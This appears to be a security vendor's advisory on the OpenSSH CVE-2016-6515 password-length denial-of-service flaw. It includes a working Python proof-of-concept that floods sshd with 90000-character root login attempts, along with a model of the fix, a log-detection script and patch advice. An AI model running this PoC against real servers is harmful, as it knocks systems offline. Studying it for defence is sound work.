OpenSSH (OpenBSD Secure Shell) is a free suite of connectivity tools that provides encrypted remote login and file transfer between two hosts over a network.

CVE-2016-6515 (Denial of Service Vulnerability)

It has been discovered that the OpenSSH server incorrectly handles password hashing when authenticating non-existent users. In OpenSSH versions prior to 7.3, the ‘auth_password’ function in the ‘auth_passwd.c’ source file, used by sshd, does not limit the length of the password. This allows remote attackers to cause a denial of service (excessive CPU consumption in the system’s crypt function) by sending a long password to sshd.
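To make the mechanism concrete, here is an added illustration of the bug shape and of the guard that the 7.3 fix places in front of the hash. It is not OpenSSH's source: the toy hash mimics the step of glibc's sha512-crypt that adds the password to a digest once per password byte (so work grows with the square of the length), and the 1024-byte cap, the salts and the user table are assumptions constructed for this demo.

```python
"""Added illustration (not OpenSSH's code) of the CVE-2016-6515 bug shape:
an authentication path that hands an unbounded password to a hash whose
cost grows with input length, and the length guard the 7.3 fix adds.
"""
import hashlib
import hmac

# OpenSSH 7.3 caps the password length before hashing; 1024 is the value
# assumed here for illustration.
MAX_PASSWORD_LEN = 1024

# Constructed salts and user table (username -> (salt, digest)).
_SALT = b"demo-salt-0123456789abcdef"
_FAKE_SALT = b"fake-salt-for-unknown-users"  # unknown users take the same path


def toy_crypt(password: bytes, salt: bytes) -> bytes:
    """Stand-in for crypt(3). Like sha512-crypt's 'DP' step it feeds the
    password into the digest once per byte of the password, so the bytes
    hashed grow as len(password)**2 (see hash_cost)."""
    h = hashlib.sha512(salt)
    for _ in range(len(password)):
        h.update(password)
    return h.digest()


def hash_cost(password: bytes) -> int:
    """Bytes toy_crypt feeds to SHA-512 for this password (salt excluded)."""
    return len(password) * len(password)


USERS = {b"root": (_SALT, toy_crypt(b"correct horse battery staple", _SALT))}


def auth_password_vulnerable(username: bytes, password: bytes) -> bool:
    """Pre-7.3 shape: whatever length arrives is hashed, and unknown users are
    still hashed (against a fake salt) so they cannot be told apart by timing.
    A 90000-byte password means 8.1 GB of hashing in toy_crypt."""
    salt, expected = USERS.get(username, (_FAKE_SALT, None))
    digest = toy_crypt(password, salt)
    return expected is not None and hmac.compare_digest(digest, expected)


def auth_password_fixed(username: bytes, password: bytes) -> bool:
    """7.3 shape: bound the input before any expensive work is done."""
    if len(password) > MAX_PASSWORD_LEN:
        return False
    return auth_password_vulnerable(username, password)


def work_done(password: bytes, fixed: bool) -> int:
    """Bytes the server would hash for this password on each code path."""
    if fixed and len(password) > MAX_PASSWORD_LEN:
        return 0
    return hash_cost(password)


if __name__ == "__main__":
    # Compare the hashing work on both code paths, without actually hashing
    # the 90000-byte case.
    for n in (8, 1024, 90000):
        pw = b"a" * n
        print(f"len={n:>6}  vulnerable hashes {work_done(pw, False):>13,} bytes"
              f"  fixed hashes {work_done(pw, True):>9,} bytes")
```

The point of the guard is its position: the length check runs before the hash, so an oversized password is rejected at the cost of a single comparison, and legitimate passwords under the cap are still hashed with the fake-salt path preserved for unknown users.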


How does it actually work? Here is the Proof of Concept:

If the remote machine is running an OpenSSH version prior to 7.3, it does not limit the password length during authentication. Hence, to exploit this vulnerability, the PoC sends a crafted password 90000 characters long in the ‘password’ field while attempting to log in to the remote machine via ssh with the username ‘root’.

PoC Code:

#######################################################################
# Open SSH DoS Vulnerability PoC Code
#
# Author:
# Kashinath T
#
# Date: 2016/08/25
#######################################################################

import sys
from random import choice
from string import ascii_lowercase

import paramiko


class ssh_exploit:

    def __init__(self):
        """
        Initialise the objects
        """

    def ssh_login(self, remote_ip):
        try:
            ## Crafted password of length 90000
            passwd_len = 90000
            crafted_passwd = "".join(choice(ascii_lowercase) for i in range(passwd_len))

            ## Connect to a remote machine via ssh
            ssh = paramiko.SSHClient()
            ssh.load_system_host_keys()
            ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())

            ## Calling connect in an infinite loop
            print("[+] Entering infinite loop")
            while True:
                ssh.connect(remote_ip, username='root', password=crafted_passwd)

        except Exception as msg:
            print("Error in connecting to remote host : ", remote_ip)
            print("Exception in : ssh_login method.")
            sys.exit(msg)


def main():
    if len(sys.argv) != 2:
        print("\n\nEnter IP of a remote machine\n\n")
        print("usage: python ssh.py 192.168.x.x")
        sys.exit()

    ## Calling ssh_login
    ref_obj = ssh_exploit()
    ref_obj.ssh_login(sys.argv[1])


if __name__ == "__main__":
    main()

The result of exploiting the OpenSSH DoS vulnerability can be seen in the screenshot below.

[Screenshot: SSHCPU, sshd CPU usage during the attack]

A remote attacker can time such an attack to exploit this issue, causing sshd to enter an infinite loop and consume excessive CPU resources (as seen in the snapshot above, where sshd accounts for 100% CPU usage). The impact of this exploit is a total shutdown of the affected resource; the attacker can render the resource completely unavailable.
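On the defender's side, sshd does not log how long a rejected password was, so the usable signal in auth logs is the shape of the attack: one source hammering password authentication while sshd CPU climbs. The following added example (constructed for this post, not part of the original) scans OpenSSH-style "Failed password" lines and reports sources whose failures within a sliding window exceed a threshold; the log lines, hostname, addresses and the assumed year are all constructed.

```python
"""Added detection example: flag sources with bursts of sshd password
failures, the observable side of a sustained CVE-2016-6515 style attack.
All log lines, hostnames and addresses are constructed."""
import re
from collections import defaultdict, deque
from datetime import datetime

# OpenSSH's syslog line for a rejected password (with or without the
# "invalid user" marker for accounts that do not exist).
FAILED_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2} +\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"Failed password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<src>\S+) port \d+ ssh2$"
)


def parse_failed(line: str, year: int = 2016):
    """Return (timestamp, user, source_ip) for a failed-password line, else None.
    Syslog timestamps carry no year, so one is supplied (2016 assumed here)."""
    m = FAILED_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return ts, m["user"], m["src"]


def find_noisy_sources(lines, window_seconds=60, threshold=10):
    """Map source IP -> peak number of failures inside any window of
    window_seconds, keeping only sources at or above threshold."""
    events = [e for e in map(parse_failed, lines) if e]
    events.sort(key=lambda e: e[0])
    recent = defaultdict(deque)   # per-source timestamps still inside the window
    peak = defaultdict(int)
    for ts, _user, src in events:
        q = recent[src]
        q.append(ts)
        while (ts - q[0]).total_seconds() > window_seconds:
            q.popleft()
        peak[src] = max(peak[src], len(q))
    return {src: n for src, n in peak.items() if n >= threshold}


# Constructed sample: one source retries root every 2 s for 24 s, another
# fails twice half an hour apart, plus one unrelated successful login.
SAMPLE_LOG = [
    f"Aug 25 10:14:{i * 2:02d} bastion sshd[{4100 + i}]: Failed password for root "
    f"from 192.0.2.10 port {51400 + i} ssh2"
    for i in range(12)
] + [
    "Aug 25 10:02:11 bastion sshd[3990]: Failed password for invalid user admin "
    "from 198.51.100.7 port 40211 ssh2",
    "Aug 25 10:31:45 bastion sshd[4301]: Failed password for invalid user admin "
    "from 198.51.100.7 port 40388 ssh2",
    "Aug 25 10:15:02 bastion sshd[4120]: Accepted publickey for deploy "
    "from 203.0.113.5 port 50001 ssh2: ED25519 SHA256:placeholder",
]

if __name__ == "__main__":
    for src, n in find_noisy_sources(SAMPLE_LOG).items():
        print(f"{src}: {n} failed password attempts inside 60 s")
```

A rate alert of this kind is most useful when correlated with host CPU telemetry for the sshd process, since the same log pattern also appears during ordinary password guessing; on an unpatched host the combination of a few persistent sources and sshd pinned at 100% CPU is the distinguishing signature.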

Affected Versions:  OpenSSH Version Prior to 7.3.

Fix: The issue can be resolved by updating the package OpenSSH to version 7.3.

SecPod Saner detects these vulnerabilities and automatically fixes them by applying security updates. Download Saner now and keep your systems updated and secure.
